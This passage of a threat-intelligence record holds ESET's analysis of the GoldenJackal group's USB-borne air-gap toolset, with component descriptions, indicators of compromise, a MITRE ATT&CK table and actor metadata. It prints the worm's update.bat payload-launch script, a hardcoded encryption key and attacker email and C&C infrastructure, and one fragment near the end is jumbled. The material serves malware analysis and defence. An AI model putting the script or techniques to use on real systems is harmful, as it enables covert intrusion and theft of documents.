with - (for example, 15 Jan 24 13-21\r\nPST).\r\nGoldenAce\r\nThis component, which we classified as a distribution tool in Figure 5, serves to propagate other malicious executables and\r\nretrieve staged files via USB drives. While it could be used to target air-gapped systems, it’s not specifically built for that, as\r\nopposed to GoldenDealer. It works together with a lightweight version of JackalWorm and some other unknown component.\r\nhttps://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/\r\nPage 13 of 21\n\nGoldenAce periodically checks drives in the list G:, H:, I:, J:, K:, L:, M:, N:, P:, X:, Y:, and Z:, to find one that is mapped to\r\na volume. Then it checks whether a trash directory exists in the root of that drive. If it doesn’t exist, it is created as hidden,\r\nand a file called update is copied to that directory, from the same location where GoldenAce is running. The first directory\r\non the drive (in alphabetical order) that is not hidden is set to hidden, and a file called upgrade is copied to the root of the\r\ndrive and renamed as \u003cname_of_hidden_directory\u003e.exe.\r\nThe file upgrade is actually JackalWorm, an executable that uses a folder icon, and whose purpose is to copy and run the\r\nupdate file on another system where the USB drive is inserted. Unlike the version of JackalWorm described by Kaspersky,\r\nthis one is very limited: it doesn’t have code to monitor drive insertions, and it cannot be configured to perform various\r\nactions. When executed from the root directory of a removable drive, it opens the hidden folder in Windows Explorer and\r\nwrites a batch file to execute the payload in update. Contents of this file, update.bat, are shown in Figure 9.\r\n@echo off\r\ncopy \"\u003cdrive_letter\u003e:\\\\trash\\\\update\" \"C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\update.exe\"\r\n\"C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\update.exe\" \"\u003cdrive_letter\u003e:\\\\trash\"\r\n:check1\r\n@tasklist | findstr /i /b \"update.exe\" \u003enul\r\n@if %errorlevel%==0 goto check1\r\n@del /f /q /a h \"C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\update.exe\"\r\n@del /f /q \"C:\\\\Users\\\\\u003cusername\u003e\\\\AppData\\\\Local\\\\update.bat\"\r\nFigure 9. Contents of update.bat\r\nWe can see that update is run and deleted, along with the batch file, once it’s done running. While we didn’t observe the\r\ncontents of the update component, it is likely that it collects files and stages them in the trash directory on the removable\r\ndrive, since the path to that directory is passed as an argument to update.\r\nWhen GoldenAce finds that the directory trash already exists on a drive, instead of copying files to the drive, it copies files\r\nin the trash directory to C:\\ProgramData\\Microsoft\\Windows\\DeviceMetadataCache.\r\nHTTP server\r\nWe observed Python’s HTTP server, packaged with PyInstaller, being executed via C:\\Windows\\system32\\cmd.exe /K\r\nC:\\Windows\\msahci.cmd. Unfortunately, we didn’t observe the contents of the msahci.cmd file, so we don’t know the\r\narguments passed for execution, such as the port for the server to listen on.\r\nGoldenBlacklist\r\nAs a processing component, GoldenBlacklist downloads an encrypted archive from a local server, and processes email\r\nmessages contained in it, to keep only those of interest. Then it generates a new archive for some other component to\r\nexfiltrate.\r\nThe URL to retrieve the initial archive is hardcoded: https://\u003clocal_ip_address\u003e/update46.zip. The downloaded file is saved\r\nas res.out, and AES decrypted with the hardcoded key\r\nk9ksbu9Q34HBKJuzHIuGTfHL9xCzMl53vguheOYA8SiNoh6Jqe62F7APtQ9pE, using a legitimate OpenSSL executable.\r\nThe decrypted archive, update46.tar.gz, is extracted in memory, and only those files that match certain criteria are written to\r\na subdirectory tmp, in the directory where the malware is running. Criteria:\r\nThe file does not contain any email on a blocklist of email addresses. This is done to remove email messages that\r\ncome from senders that usually are not interesting. While we can’t include the full list here, it’s worth mentioning\r\nthat many of the email addresses are related to newsletters and press releases. It’s important to note that the attackers\r\nmust have been operating for some time to build a list like this.\r\nThe file contains the string Content-Type: application. This is to keep email messages that have attachments, such as\r\nPDF files, Microsoft Office files, and archives, to name a few.\r\nOnce the files are selected, GoldenBlacklist archives the tmp directory and encrypts it with openssl.exe, using the same\r\nencryption key as the one used to decrypt the initial archive. The resulting file is archive.out. All intermediate files and\r\nfolders are then deleted, as well as openssl.exe, libssl-3-x64.dll, and libcrypto-3-x64.dll, all located in the malware’s\r\nhttps://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/\r\nPage 14 of 21\n\ndirectory. This indicates that another component that we didn’t observe copied those legitimate binaries there in the first\r\nplace.\r\nGoldenPyBlacklist\r\nGoldenPyBlacklist is a Python implementation of GoldenBlacklist. It was packaged with PyInstaller and the original name\r\nof the script is duplxer_black_list_for_external_use.py. Some differences to the other component are:\r\nthe initial archive is written as ress.out,\r\nthe key for decryption is the same, except for a different first character,\r\nthe decrypted archive is extracted to the C:\\Windows\\System32\\temp directory for processing,\r\none additional criterion for file selection is added to process only filenames that end in .msg (these are files created\r\nwith Microsoft Outlook),\r\nfiles that do not meet the criteria are deleted,\r\nthe final archive is created with the 7-Zip archiver, and\r\nthe final encrypted file is named ArcSrvcUI.ter.\r\nGoldenMailer\r\nClassified as an exfiltration component, GoldenMailer exfiltrates files by sending emails with attachments to attacker-controlled accounts. It was written in Python and packaged with PyInstaller, and the original name of the script is\r\nsend_to_hole.py. GoldenMailer connects to legitimate servers – either smtp-mail.outlook.com or smtp.office365.com – to\r\nsend email messages, using SMTP on port 587.\r\nThe configuration is read from a file, C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.ini, in the same directory\r\nwhere GoldenMailer is running. The configuration consists of the following five lines:\r\nemail address to authenticate to the SMTP server, and to use as both sender and destination address,\r\npassword to authenticate to the SMTP server,\r\npath to directory with archives to exfiltrate,\r\nbase filename (e.g., press.pdf) used for archives to exfiltrate; these archives use the following naming convention:\r\n\u003cbase_filename\u003e.\u003cthree_digit_sequence_number\u003e, and\r\nnumber of files to exfiltrate.\r\nWe noticed that this configuration file was copied from another PC in the local network. Given that the configuration file\r\nindicates how many archives are available to be exfiltrated, we assume that these archives must also be copied over the\r\nnetwork, separating the tasks of collection, distribution, and exfiltration. It is likely that the configuration file is generated by\r\nthe component in charge of collecting files and creating archives for exfiltration, but we didn’t observe that component.\r\nFigure 10 shows an example of an email message sent by GoldenMailer. The subject has a typo: it reads Press realese. The\r\nbody is very simple and reads: Daily News about Israel-Hamas war. These strings are hardcoded in the malware’s binary.\r\nOnly one attachment is sent per email; if there are many archives to exfiltrate, one email is sent for each.\r\nhttps://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/\r\nPage 15 of 21\n\nFigure 10. Example of an email message used to exfiltrate files\r\nThe configuration files that we observed contained the following email addresses:\r\nmariaalpane@outlook[.]com\r\nkatemarien087@outlook[.]com\r\nspanosmitsotakis@outlook[.]com\r\nGoldenDrive\r\nAs opposed to GoldenMailer, this component exfiltrates files by uploading them to Google Drive. Necessary credentials are\r\nfound in two files, which are hardcoded in the malware: credentials.json, which contains fields such as client_id and\r\nclient_secret, and token.json, with fields such as access_token and refresh_token. A reference to Google Drive’s API and\r\nsome code snippets in the Go programming language can be found here.\r\nSimilar to GoldenMailer, this component can upload only one file at a time. GoldenDrive is executed with an argument that\r\nprovides the full path to the file to upload.\r\nConclusion\r\nIn this blogpost, we revealed two new toolsets used by the GoldenJackal APT group to target air-gapped systems of\r\ngovernmental organizations, including those in Europe. Common functionalities include the use of USB drives to steal\r\nconfidential documents.\r\nManaging to deploy two separate toolsets for breaching air-gapped networks in only five years shows that GoldenJackal is a\r\nsophisticated threat actor aware of network segmentation used by its targets.\r\nA comprehensive list of indicators of compromise (IoCs) can be found in our GitHub repository.\r\nFor any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com. \r\nESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit\r\nthe ESET Threat Intelligence page.\r\nIoCs\r\nhttps://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/\r\nPage 16 of 21\n\nFiles\r\nSHA-1  Filename  Detection  Descript\r\nDA9562F5268FA61D19648DFF9C6A57FB8AB7B0D7 winaero.exe  Win32/Agent.AGKQ  GoldenD\r\n5F12FFD272AABC0D5D611D18812A196A6EA2FAA9 1102720677 \r\nPython/Agent.ANA \r\nPython/HackTool.Agent.W \r\nPython/Riskware.LdapDump.A \r\nPython/Riskware.Impacket.C \r\nGoldenH\r\n6DE7894F1971FDC1DF8C4E4C2EDCC4F4489353B6 OfficeAutoComplete.exe WinGo/Agent.AAO  GoldenR\r\n7CB7C3E98CAB2226F48BA956D3BE79C52AB62140 prinntfy.dll  WinGo/DataStealer.A  GoldenU\r\n8F722EB29221C6EAEA9A96971D7FB78DAB2AD923 zUpdater.exe  WinGo/Spy.Agent.AH  GoldenU\r\n24FBCEC23E8B4B40FEA188132B0E4A90C65E3FFB fc.exe  WinGo/DataStealer.C  GoldenA\r\nA87CEB21EF88350707F278063D7701BDE0F8B6B7 upgrade  MSIL/Agent.WPJ \r\nJackalWo\r\nsimpler v\r\n9CBE8F7079DA75D738302D7DB7E97A92C4DE5B71 fp.exe  WinGo/Spy.Agent.CA  GoldenB\r\n9083431A738F031AC6E33F0E9133B3080F641D90 fp.exe  Python/TrojanDownloader.Agent.YO GoldenP\r\nC830EFD843A233C170285B4844C5960BA8381979 cb.exe  Python/Agent.ALE  GoldenM\r\nF7192914E00DD0CE31DF0911C073F522967C6A97 GoogleUpdate.exe  WinGo/Agent.YH  GoldenD\r\nB2BAA5898505B32DF7FE0A7209FC0A8673726509 fp.exe  Python/Agent.ALF \r\nPython H\r\nserver. \r\nNetwork\r\nIP  Domain  Hosting provider  First seen  Details \r\n83.24.9[.]124  N/A \r\nOrange Polska\r\nSpolka Akcyjna \r\n2019‑08‑09 \r\nPrimary C\u0026C server used by\r\nGoldenJackal in 2019. \r\n196.29.32[.]210  N/A  UTANDE  2019‑08‑09 \r\nSecondary C\u0026C server used by\r\nGoldenJackal in 2019. \r\nhttps://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/\r\nPage 17 of 21\n\nIP  Domain  Hosting provider  First seen  Details \r\nN/A  assistance[.]uz  N/A  2019‑09‑25 \r\nCompromised website used to\r\ndownload malware. \r\nN/A  thehistore[.]com  N/A  2019‑09‑25 \r\nCompromised website used as a\r\nC\u0026C server. \r\nN/A  xgraphic[.]ro  N/A  2019‑09‑25 \r\nCompromised website used as a\r\nC\u0026C server. \r\nEmail Addresses\r\nmariaalpane@outlook[.]com\r\nkatemarien087@outlook[.]com\r\nspanosmitsotakis@outlook[.]com\r\nMITRE ATT\u0026CK techniques\r\nThis table was built using version 15 of the MITRE ATT\u0026CK framework.\r\nTactic  ID  Name  Description \r\nResource\r\nDevelopment \r\nT1583.003 \r\nAcquire Infrastructure:\r\nVirtual Private Server \r\nGoldenJackal probably acquired a VPS server to use as a\r\nsecondary C\u0026C server for the GoldenDealer malware. \r\nT1583.004 \r\nAcquire Infrastructure:\r\nServer \r\nGoldenJackal likely acquired a server to use as a primary\r\nC\u0026C server for the GoldenDealer malware. \r\nT1584.006 \r\nCompromise\r\nInfrastructure: Web\r\nServices \r\nGoldenJackal has used compromised WordPress sites for\r\nC\u0026C infrastructure, used by the JackalControl and\r\nJackalSteal malware. \r\nT1587.001 \r\nDevelop Capabilities:\r\nMalware \r\nGoldenJackal develops its own custom malware. \r\nT1585.003 \r\nEstablish Accounts:\r\nCloud Accounts \r\nGoldenJackal has used Google Drive to store exfiltrated\r\nfiles and legitimate tools. \r\nT1588.002 \r\nObtain Capabilities:\r\nTool \r\nGoldenJackal uses legitimate tools, such as Plink and\r\nPsExec, for post-compromise operations. \r\nExecution \r\nT1059.001 \r\nCommand and Scripting\r\nInterpreter: PowerShell \r\nGoldenJackal executed PowerShell scripts to download\r\nthe JackalControl malware from a compromised\r\nWordPress website. \r\nT1059.003 \r\nCommand and Scripting\r\nInterpreter: Windows\r\nCommand Shell \r\nGoldenAce uses cmd.exe to run a batch script to execute\r\nother malicious components. \r\nT1059.006 \r\nCommand and Scripting\r\nInterpreter: Python \r\nGoldenHowl contains various malicious modules that are\r\nPython scripts. \r\nT1106  Native API \r\nGoldenDealer can copy and run an executable file with\r\nthe CreateProcessW API. \r\nT1569.002 \r\nSystem Services:\r\nService Execution \r\nGoldenDealer can run as a service. \r\nT1204.002 \r\nUser Execution:\r\nMalicious File \r\nJackalWorm uses a folder icon to entice a potential victim\r\nto launch it. \r\nhttps://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/\r\nPage 18 of 21\n\nTactic  ID  Name  Description \r\nPersistence \r\nT1543.003 \r\nCreate or Modify\r\nSystem Process:\r\nWindows Service \r\nGoldenDealer creates the service\r\nNetDnsActivatorSharing to persist on a compromised\r\nsystem. \r\nT1547.001 \r\nBoot or Logon Autostart\r\nExecution: Registry\r\nRun Keys / Startup\r\nFolder \r\nIf GoldenDealer fails to create a service for persistence,\r\nan entry in a Run registry key is created instead. \r\nT1053.005 \r\nScheduled Task/Job:\r\nScheduled Task \r\nGoldenHowl creates the scheduled task\r\nMicrosoft\\Windows\\Multimedia\\\r\nSystemSoundsService2 for persistence. \r\nDefense\r\nEvasion \r\nT1564.001 \r\nHide Artifacts: Hidden\r\nFiles and Directories \r\nGoldenDealer modifies the registry so that hidden files\r\nand directories are not shown in Windows Explorer.\r\nGoldenDealer, GoldenAce, and Jackal worm create\r\nhidden folders on USB drives. \r\nT1070.004 \r\nIndicator Removal: File\r\nDeletion \r\nGoldenAce deletes payloads after they are run.\r\nGoldenBlacklist and GoldenPyBlacklist delete\r\nintermediate files after the final archives are generated. \r\nT1036.005 \r\nMasquerading: Match\r\nLegitimate Name or\r\nLocation \r\nGoldenUsbCopy uses a legitimate Firefox directory\r\nC:\\Users\\\r\n\u003cusername\u003e\\AppData\\Roaming\\Mozilla\\Firefox\\ to stage\r\nfiles. \r\nT1036.008 \r\nMasquerading:\r\nMasquerade File Type \r\nJackalWorm uses a folder icon to disguise itself as a non-executable file. \r\nT1112  Modify Registry \r\nGoldenDealer modifies the registry so that hidden files\r\nand directories are not shown in Windows Explorer. \r\nT1027.013 \r\nObfuscated Files or\r\nInformation:\r\nEncrypted/Encoded\r\nFile \r\nGoldenJackal uses various encryption algorithms in its\r\ntoolset, such as XOR, Fernet, and AES, to encrypt\r\nconfiguration files and files to be exfiltrated. \r\nCredential\r\nAccess \r\nT1552.001 \r\nUnsecured Credentials:\r\nCredentials In Files \r\nGoldenUsbGo looks for files with filenames that are\r\nusually associated with credentials. \r\nT1552.004 \r\nUnsecured Credentials:\r\nPrivate Keys \r\nGoldenUsbGo looks for files that may contain private\r\nkeys, such as those with filenames that contain id_rsa. \r\nDiscovery  T1087.001 Account Discovery:\r\nLocal Account \r\nGoldenDealer collects information about all user accounts\r\non a compromised system. \r\nT1083 \r\nFile and Directory\r\nDiscovery \r\nGoldenHowl has a module to generate a listing of files\r\nand directories on a compromised system.\r\nGoldenUsbCopy and GoldenUsbGo generate a listing of\r\nfiles and directories on a USB drive. \r\nT1046 \r\nNetwork Service\r\nDiscovery \r\nGoldenHowl can scan a remote system for open ports,\r\nand whether the target is vulnerable to EternalBlue\r\nmalware. \r\nT1120  Peripheral Device\r\nDiscovery \r\nGoldenDealer and GoldenUsbCopy monitor the insertion\r\nof removable drives. GoldenUsbGo and GoldenAce\r\nhttps://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/\r\nPage 19 of 21\n\nTactic  ID  Name  Description \r\ncheck for various drive letters, to detect attached\r\nremovable drives. \r\nT1057  Process Discovery \r\nGoldenDealer obtains information about running\r\nprocesses on a compromised system. \r\nT1018 \r\nRemote System\r\nDiscovery \r\nGoldenHowl can scan an IP range to discover other\r\nsystems. \r\nT1518  Software Discovery \r\nGoldenDealer obtains information about installed\r\nprograms on a compromised system. \r\nT1082 \r\nSystem Information\r\nDiscovery \r\nGoldenDealer obtains various information about the\r\noperating system and user accounts on a compromised\r\nsystem. \r\nT1016.001 \r\nSystem Network\r\nConfiguration\r\nDiscovery: Internet\r\nConnection Discovery \r\nGoldenDealer can determine whether a computer is\r\nconnected to the internet. \r\nT1135 \r\nNetwork Share\r\nDiscovery \r\nGoldenAce checks a list of drive letters that can include\r\nnetwork shares. \r\nLateral\r\nMovement \r\nT1210 \r\nExploitation of Remote\r\nServices \r\nGoldenHowl can check for a Windows SMB remote code\r\nexecution vulnerability that can then be exploited for\r\nlateral movement. \r\nT1091 \r\nReplication Through\r\nRemovable Media \r\nGoldenDealer copies executables to and from USB\r\ndrives, to target air-gapped systems. GoldenAce\r\npropagates malicious executables via removable drives. \r\nCollection \r\nT1560.002 \r\nArchive Collected Data:\r\nArchive via Library \r\nGoldenRobo and GoldenUsbCopy archive files to be\r\nexfiltrated with the ZIP library. \r\nT1119  Automated Collection \r\nGoldenUsbCopy and GoldenUsbGo automatically stage\r\nfiles for later exfiltration, when a new removable drive is\r\ndetected. \r\nT1005 \r\nData from Local\r\nSystem \r\nMost tools in GoldenJackal’s toolset collect information\r\nand files from the local system. \r\nT1025 \r\nData from Removable\r\nMedia \r\nGoldenUsbCopy and GoldenUsbGo collect interesting\r\nfiles from removable media. \r\nGoldenAce can retrieve staged files from a specific\r\ndirectory on a removable drive. \r\nGoldenDealer can retrieve information from\r\ncompromised systems from a specific directory on a\r\nremovable drive. \r\nT1074.001 \r\nData Staged: Local Data\r\nStaging \r\nMost tools in GoldenJackal’s toolset stage files locally for\r\nother components to process or exfiltrate them. \r\nT1114.001 \r\nEmail Collection: Local\r\nEmail Collection \r\nGoldenBlacklist and GoldenPyBlacklist process email\r\nfiles that were collected by an unknown component in\r\nGoldenJackal’s toolset. \r\nCommand\r\nand Control  T1071.001 \r\nApplication Layer\r\nProtocol: Web\r\nProtocols \r\nGoldenDealer and GoldenHowl use HTTPS for\r\ncommunication. \r\nhttps://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/\r\nPage 20 of 21\n\nTactic  ID  Name  Description \r\nT1092 \r\nCommunication\r\nThrough Removable\r\nMedia \r\nGoldenDealer uses removable media to pass executables\r\nto air-gapped systems, and information from those\r\nsystems back to connected systems. \r\nT1132.001 \r\nData Encoding:\r\nStandard Encoding \r\nExecutable files sent from the C\u0026C server to\r\nGoldenDealer are base64 encoded. \r\nT1572  Protocol Tunneling \r\nGoldenHowl can forward messages through an SSH\r\ntunnel. \r\nT1090.001  Proxy: Internal Proxy  GoldenHowl can act as a proxy, forwarding packets. \r\nExfiltration \r\nT1041 \r\nExfiltration Over C2\r\nChannel \r\nGoldenHowl exfiltrates files via the same channel used as\r\nits C\u0026C. \r\nT1052.001 \r\nExfiltration Over\r\nPhysical Medium:\r\nExfiltration over USB \r\nGoldenJackal’s toolset provides capabilities to copy files\r\nfrom air-gapped systems and move them to connected\r\nsystems via USB drives, for exfiltration. \r\nT1567.002 \r\nExfiltration Over Web\r\nService: Exfiltration to\r\nCloud Storage \r\nGoldenDrive exfiltrates files to an attacker-controlled\r\nGoogle Drive account. \r\nT1048.002 \r\nExfiltration Over\r\nAlternative Protocol:\r\nExfiltration Over\r\nAsymmetric Encrypted\r\nNon-C2 Protocol \r\nGoldenMailer exfiltrates files via SMTP, using\r\nSTARTTLS on port 587. \r\nSource: https://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/\r\nhttps://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/\r\nPage 21 of 21\n\ninformation as well. are sent as arrays Figure 2 shows of decimal character part of the JSON codes, for readability object with the information we show them as sent to the C\u0026C strings in the image. server. While For example, all strings instead of\nlsass.exe, the value [108, 115, 97, 115, 115, 46, 101, 120, 101] is actually sent.\n Page 5 of 21", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/" ], "report_names": [ "mind-air-gap-goldenjackal-gooses-government-guardrails" ], "threat_actors": [ { "id": "8aaa5515-92dd-448d-bb20-3a253f4f8854", "created_at": "2024-06-19T02:03:08.147099Z", "updated_at": "2026-04-10T02:00:03.685355Z", "deleted_at": null, "main_name": "IRON HUNTER", "aliases": [ "ATK13 ", "Belugasturgeon ", "Blue Python ", "CTG-8875 ", "ITG12 ", "KRYPTON ", "MAKERSMARK ", "Pensive Ursa ", "Secret Blizzard ", "Turla", "UAC-0003 ", "UAC-0024 ", "UNC4210 ", "Venomous Bear ", "Waterbug " ], "source_name": "Secureworks:IRON HUNTER", "tools": [ "Carbon-DLL", "ComRAT", "LightNeuron", "Mosquito", "PyFlash", "Skipper", "Snake", "Tavdig" ], "source_id": "Secureworks", "reports": null }, { "id": "a8356cf9-e9d6-4585-8ccf-d30d3efe142b", "created_at": "2023-06-23T02:04:34.262059Z", "updated_at": "2026-04-10T02:00:04.711064Z", "deleted_at": null, "main_name": "GoldenJackal", "aliases": [], "source_name": "ETDA:GoldenJackal", "tools": [ "JackalControl", "JackalPerInfo", "JackalScreenWatcher", "JackalSteal", "JackalWorm" ], "source_id": "ETDA", "reports": null }, { "id": "821cb2ce-472c-438f-943d-19cf23204d9a", "created_at": "2023-11-01T02:01:06.683709Z", "updated_at": "2026-04-10T02:00:05.39433Z", "deleted_at": null, "main_name": "MoustachedBouncer", "aliases": [ "MoustachedBouncer" ], "source_name": "MITRE:MoustachedBouncer", "tools": [ "SharpDisco" ], "source_id": "MITRE", "reports": null }, { "id": "7d9d90f3-001e-4adc-8a77-8f93b5d02b01", "created_at": "2023-09-07T02:02:47.575324Z", "updated_at": "2026-04-10T02:00:04.770856Z", "deleted_at": null, "main_name": "MoustachedBouncer", "aliases": [], "source_name": "ETDA:MoustachedBouncer", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac", "created_at": "2022-10-25T16:07:24.349252Z", "updated_at": "2026-04-10T02:00:04.949821Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "ATK 13", "Belugasturgeon", "Blue Python", "CTG-8875", "G0010", "Group 88", "ITG12", "Iron Hunter", "Krypton", "Makersmark", "Operation Epic Turla", "Operation Moonlight Maze", "Operation Penguin Turla", "Operation Satellite Turla", "Operation Skipper Turla", "Operation Turla Mosquito", "Operation WITCHCOVEN", "Pacifier APT", "Pensive Ursa", "Popeye", "SIG15", "SIG2", "SIG23", "Secret Blizzard", "TAG-0530", "Turla", "UNC4210", "Venomous Bear", "Waterbug" ], "source_name": "ETDA:Turla", "tools": [ "ASPXSpy", "ASPXTool", "ATI-Agent", "AdobeARM", "Agent.BTZ", "Agent.DNE", "ApolloShadow", "BigBoss", "COMpfun", "Chinch", "Cloud Duke", "CloudDuke", "CloudLook", "Cobra Carbon System", "ComRAT", "DoublePulsar", "EmPyre", "EmpireProject", "Epic Turla", "EternalBlue", "EternalRomance", "GoldenSky", "Group Policy Results Tool", "HTML5 Encoding", "HyperStack", "IcedCoffee", "IronNetInjector", "KSL0T", "Kapushka", "Kazuar", "KopiLuwak", "Kotel", "LOLBAS", "LOLBins", "LightNeuron", "Living off the Land", "Maintools.js", "Metasploit", "Meterpreter", "MiamiBeach", "Mimikatz", "MiniDionis", "Minit", "NBTscan", "NETTRANS", "NETVulture", "Neptun", "NetFlash", "NewPass", "Outlook Backdoor", "Penquin Turla", "Pfinet", "PowerShell Empire", "PowerShellRunner", "PowerShellRunner-based RPC backdoor", "PowerStallion", "PsExec", "PyFlash", "QUIETCANARY", "Reductor RAT", "RocketMan", "SMBTouch", "SScan", "Satellite Turla", "SilentMoon", "Sun rootkit", "TTNG", "TadjMakhal", "Tavdig", "TinyTurla", "TinyTurla Next Generation", "TinyTurla-NG", "Topinambour", "Tunnus", "Turla", "Turla SilentMoon", "TurlaChopper", "Uroburos", "Urouros", "WCE", "WITCHCOVEN", "WhiteAtlas", "WhiteBear", "Windows Credential Editor", "Windows Credentials Editor", "Wipbot", "WorldCupSec", "XTRANS", "certutil", "certutil.exe", "gpresult", "nbtscan", "nbtstat", "pwdump" ], "source_id": "ETDA", "reports": null }, { "id": "0e74afe0-92c3-4fca-93a4-d8e51180e105", "created_at": "2023-08-11T02:00:11.229735Z", "updated_at": "2026-04-10T02:00:03.37095Z", "deleted_at": null, "main_name": "MoustachedBouncer", "aliases": [], "source_name": "MISPGALAXY:MoustachedBouncer", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bacb81f4-18d1-4dcd-b277-65a9dac41b61", "created_at": "2023-11-04T02:00:07.680044Z", "updated_at": "2026-04-10T02:00:03.390891Z", "deleted_at": null, "main_name": "GoldenJackal", "aliases": [], "source_name": "MISPGALAXY:GoldenJackal", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "a97fee0d-af4b-4661-ae17-858925438fc4", "created_at": "2023-01-06T13:46:38.396415Z", "updated_at": "2026-04-10T02:00:02.957137Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "TAG_0530", "Pacifier APT", "Blue Python", "UNC4210", "UAC-0003", "VENOMOUS Bear", "Waterbug", "Pfinet", "KRYPTON", "Popeye", "SIG23", "ATK13", "ITG12", "Group 88", "Uroburos", "Hippo Team", "IRON HUNTER", "MAKERSMARK", "Secret Blizzard", "UAC-0144", "UAC-0024", "G0010" ], "source_name": "MISPGALAXY:Turla", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3", "created_at": "2022-10-25T15:50:23.509601Z", "updated_at": "2026-04-10T02:00:05.277674Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "Turla", "IRON HUNTER", "Group 88", "Waterbug", "WhiteBear", "Krypton", "Venomous Bear", "Secret Blizzard", "BELUGASTURGEON" ], "source_name": "MITRE:Turla", "tools": [ "PsExec", "nbtstat", "ComRAT", "netstat", "certutil", "KOPILUWAK", "IronNetInjector", "LunarWeb", "Arp", "Uroburos", "PowerStallion", "Kazuar", "Systeminfo", "LightNeuron", "Mimikatz", "Tasklist", "LunarMail", "HyperStack", "NBTscan", "TinyTurla", "Penquin", "LunarLoader" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434369, "ts_updated_at": 1775792015, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/7439fdf6bdddb43015fe67a25183dbcbf270b8aa.pdf", "text": "https://archive.orkl.eu/7439fdf6bdddb43015fe67a25183dbcbf270b8aa.txt", "img": "https://archive.orkl.eu/7439fdf6bdddb43015fe67a25183dbcbf270b8aa.jpg" } }